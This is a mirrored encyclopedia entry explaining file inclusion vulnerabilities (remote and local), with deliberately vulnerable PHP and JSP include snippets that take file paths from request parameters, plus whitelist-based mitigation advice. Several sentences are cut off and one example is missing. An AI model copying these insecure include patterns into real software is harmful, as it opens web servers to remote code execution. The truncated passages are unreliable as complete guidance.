词条 | File inclusion vulnerability |
释义 |
A file inclusion vulnerability is a type of web vulnerability that is most commonly found to affect web applications that rely on a scripting run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time. A file include vulnerability is distinct from a generic directory traversal attack, in that directory traversal is a way of gaining unauthorized file system access, and a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file include vulnerability will result in remote code execution on the web server that runs the affected web application. Types of inclusionRemote file inclusionRemote file inclusion (RFI) occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an HTTP or FTP URI as a user-supplied parameter to the web application. Local file inclusionLocal file inclusion (LFI) is similar to a remote file inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included for execution. This issue can still lead to remote code execution by including a file that contains attacker-controlled data such as the web server's access logs. Programming languagesPHPIn PHP the main cause is due to the use of unvalidated user-input with a filesystem function that includes a file for execution. Most notable are the ExampleConsider this PHP script which includes a file specified by request: if ( isset( $_GET['language'] ) ) { include( $_GET['language'] . '.php' ); } ?> The developer intended to read in
The best solution in this case is to use a whitelist of accepted language parameters. If a strong method of input validation such as a whitelist cannot be used, then rely upon input filtering or validation of the passed-in path to make sure it does not contain unintended characters and character patterns. However, this may require anticipating all possible problematic character combinations. A safer solution is to use a predefined Switch/Case statement to determine which file to include rather than use a URL or form parameter to dynamically generate the path. JavaServer Pages (JSP)JavaServer Pages (JSP) is a scripting language which can include files for execution at runtime. ExampleThe following script is vulnerable to a file inclusion vulnerability: <% String p = request.getParameter("p"); @include file="<%="includes/" + p +".jsp"%>" %>
Server Side Includes (SSI)A Server Side Include is very uncommon and are not typically enabled on a default web server. A server-side include can be used to gain remote code execution on a vulnerable web server.[6] ExampleThe following code is vulnerable to a remote-file inclusion vulnerability: The above code is not an XSS vulnerability, but rather including a new file to be executed by the server. See also{{Portal|Computer Security}}
References1. ^{{cite web | url=http://www.php.net/manual/en/features.remote-files.php | title=Using remote files | publisher=PHP | accessdate=March 3, 2013}} 2. ^{{cite web | url=http://php.net/manual/en/ini.list.php|title=List of php.ini directives|publisher=PHP|accessdate=October 21, 2016}} 3. ^{{cite web | url=http://projects.webappsec.org/Remote-File-Inclusion | title=Remote File Inclusion | publisher=The Web Application Security Consortium | accessdate=March 3, 2013}} 4. ^{{cite web | url=http://cwe.mitre.org/data/definitions/98.html | title=CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') | publisher=Mitre | work=Common Weakness Enumeration (CWE) | accessdate=March 3, 2013}} 5. ^{{Cite web|url=https://bugs.php.net/bug.php?id=39863|title=PHP :: Request #39863 :: file_exists() silently truncates after a null byte|website=bugs.php.net|access-date=2016-10-21}} 6. ^{{Cite web|url=http://httpd.apache.org/docs/current/howto/ssi.html#exec|title=Apache httpd Tutorial: Introduction to Server Side Includes - Apache HTTP Server Version 2.4|website=httpd.apache.org|access-date=2016-10-21}} External links
3 : Injection exploits|Web security exploits|Computer security exploits |
随便看 |
|
开放百科全书收录14589846条英语、德语、日语等多语种百科知识,基本涵盖了大多数领域的百科知识,是一部内容自由、开放的电子版国际百科全书。